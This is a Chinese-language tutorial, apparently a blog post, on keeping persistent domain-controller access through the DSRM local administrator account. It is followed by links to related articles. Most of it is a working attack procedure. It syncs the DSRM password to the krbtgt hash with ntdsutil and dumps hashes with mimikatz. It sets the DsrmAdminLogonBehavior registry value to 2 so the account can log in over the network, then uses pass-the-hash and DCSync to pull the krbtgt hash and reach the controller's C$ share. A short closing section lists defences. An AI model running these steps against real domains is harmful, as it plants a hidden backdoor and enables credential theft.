权限维持:DSRM 域控权限维持
域控权限维持
- 1 修改 DSRM 密码
- 2 DSRM 域后门操作过程
- 3 DSRM 域后门防御
- 目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器域控制器的安全模式启动选项。每个域控制器都有一个本地管理员账户 (也就是DSRM账户)。
- DSRM用途:允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库,使域环境的运行恢复正常。在域环境创建初期,DSRM 的密码需要在安装 DC 时设置,且很少会被重置。修改 DSRM 密码最基本的方法是在 DC 上运行ntdsutil 命令行修改。
- 在渗透测试: 可以使用DSRM对域环境进行持久化操作。适用版本为windows server2008(需安装KB961320才可以使用指定域账号的密码对DSRM的密码进行同步)及以后的版本,windows server2003不能使用此方法。
- 每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。
1 修改 DSRM 密码
# Win08(已安装KB961320)及以上,可以将 DSRM 密码同步为已存在的域账号密码。
NTDSUTIL:打开ntdsutil
set DSRM password:修改DSRM的密码
sync from domain account domainusername:使DSRM的密码和指定域用户的密码同步
q(第1次):退出DSRM密码设置模式
q(第2次):退出ntdsutil# 补充,直接修改 DSRM密码
NTDSUTIL:打开ntdsutil
set DSRM password:修改DSRM的密码
reset password on server null:在当前域控制器上恢复 DSRM 密码
<PASSWORD>:修改后的密码
q(第1次):退出DSRM密码设置模式
q(第2次):退出ntdsutil
2 DSRM 域后门操作过程
获取 krbtgt 的 NTLM hash
# 域控制器中使用mimikatz查看 krbtgt 的 NTLM hash privilege::debug lsadump::lsa /patch /name:krbtgt# 得到NTLM : fa02a0e57e5ba9189d00990ae64e87ce查看同步前与同步后 DSRM 账号的 NTLM hash
# 查看同步前 DSRM 账号的 NTLM hash token::elevate lsadump::sam# 将 DSRM 账号和 krbtgt 的 NTLM Hash 同步 NTDSUTIL set DSRM password sync from domain account krbtgt# 查看同步后 DSRM 账号的 NTLM hash lsadump::sam修改 DSRM 的登录方式
DSRM有三种登录方式,具体如下:
- 0:默认值,只有当域控制器重启并进入DSRM模式时,才可以使用DSRM管理员账号
- 1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器
- 2:在任何情况下,都可以使用DSRM管理员账号登录域控制器
- 在 Windows 对 DSRM 使用控制台登录域控制器进行了限制。如果要使用DSRM账号通过网络登录域控制器,需要将该值设置为2。
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD利用 mimikatz 使用 DSRM 账号通过网络远程登录域控制器
# 在域成员机器的管理员(如本地管理员)模式下打开 mimikatz privilege::debug # 注意:此处的 /domain 的值为域控制器的主机名 sekurlsa::pth /domain:dc /user:administrator /ntlm:fa02a0e57e5ba9189d00990ae64e87ce# Hash 传递完成后,在弹出的命令行窗口中打开mimikatz,使用 dcsync 功能远程转储 hash。 lsadump::dcsync /domain:test.lab /dc:dc /user:krbtgtdir \\dc\c$
3 DSRM 域后门防御
- 定期检测注册表中用于控制 DSRM 登录方式的键值
hklm:\system\currentcontrolset\control\lsa\dsrmadminlogonbehavior,确认该键值为 1。或者删除该键值。 - 定期修改域中所有域控制器的 DSRM 密码。
- 经常检查 ID 为 4794 的日志,尝试设置活动目录服务还原模式的管理员密码会被记录在4794日志中。
权限维持:DSRM 域控权限维持相关推荐
- 权限维持之:SID History 域控权限维持
权限维持之:SID History 域控权限维持 1 SID 作用 2 利用 SID History 操作过程 3 SID History 权限维持的防御 1 SID 作用 每个用户都有自己的SI ...
- mimikatz hash传递--获取域控权限
mimikatz hash传递–获取域控权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码) win_serve ...
- 黄金票据维持域控权限
黄金票据维持域控权限 实验环境:windows2012域控.windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 ...
- 牛红红的日记(平平无奇拿下域控)
牛红红的日记(平平无奇拿下域控) 注:本文首发地址:https://www.sec-in.com 文章作者为-句芒安全实验室-成员之一,欢迎微信搜索关注我们. 一.引文 x年x月x日 晴 我是一只牛, ...
- Windows 内网渗透之攻击域控
文章目录 内网渗透之攻击域控 前言 高权限读取本地密码 procdump+mimikatz绕过杀软 SYSVOL组策略获取密码 Kerberoasting 暴力破解密码 原理 使用setspn查询sp ...
- 【内网安全】横向移动域控提权NetLogonADCSPACKDC永恒之蓝
文章目录 章节点 横向移动-系统漏洞-CVE-2017-0146(永恒之蓝) 影响版本 插件检测-横向移动 CS联动MSF-检测&利用 横向移动-域控提权-CVE-2014-6324 横向移动 ...
- 域控-笔记二(域权限,域组,域管理,Kerberso 协议)
文章目录 一. 域环境搭建 1.1 添加AD功能 1.2 安装 1.3 部署 二. 如何加入域 2.1 加入域 2.2 域中主机登录 2.3 退出域 2.4 添加域用户 三. 域权限 3.1 A-G- ...
- 内网渗透(七十二)之域权限维持之伪造域控
伪造域控 2022年1月10日,国外安全研究员Kaido发文称发现了一种新的伪造域控方式,安全研究员只需要新建一个机器账户,然后修改机器账户的UserAccountControl属性为8192.活动目 ...
- 域服务器如何限制用户授权访问网站,域控服务器怎么设置用户权限
域控服务器怎么设置用户权限 内容精选 换一换 如果您需要对华为云上购买的裸金属服务器资源,给企业中的员工设置不同的访问权限,以达到不同员工之间的权限隔离,您可以使用统一身份认证服务(Identity ...
- 域控服务器通过策略提升普通用户权限
提升普通域用户权限,用于普通用户安装软件 1.在域控主机上添加一条GPO,指向需要权限的OU 2.编辑GPO-用户配置-控制面板设置-本地用户和组 3.然后右击-新建-本地组 4.操作选:更新, 组名 ...
最新文章
- 2022-2028年中国TFT玻璃行业市场研究及前瞻分析报告
- 仅需10分钟:开启你的机器学习之路
- install virtualenv
- git diff的用法
- leetcode刷题之树(1)
- boost::mp11::mp_third相关用法的测试程序
- java util包类_java.util包下的类及常用方法
- BCB6代码格式化外挂
- 读取mmdetection训练目标检测模型的日志文件(log.json)的各种AP值按epoch写入excel文件
- 968. 监控二叉树(JavaScript)
- 大数据开发之Hadoop---初始Hadoop
- 考研数据结构--严版图相关代码 自用
- (转)华为面试题算什么,这个背会了外企随便进
- python程序设计从基础到开发课后题答案夏敏捷_Python程序设计——从基础到开发...
- php设计模式 参考地址
- [禅悟人生]有一种禅心叫认真
- MYSQL之错误代码----mysql错误代码与JAVA实现
- php常用函数wps,[WPSEC]——WP
- 高斯 二维 matlab,MATLAB实例:二维高斯分布图
- SpringBoot整合Keycloak实现单点登录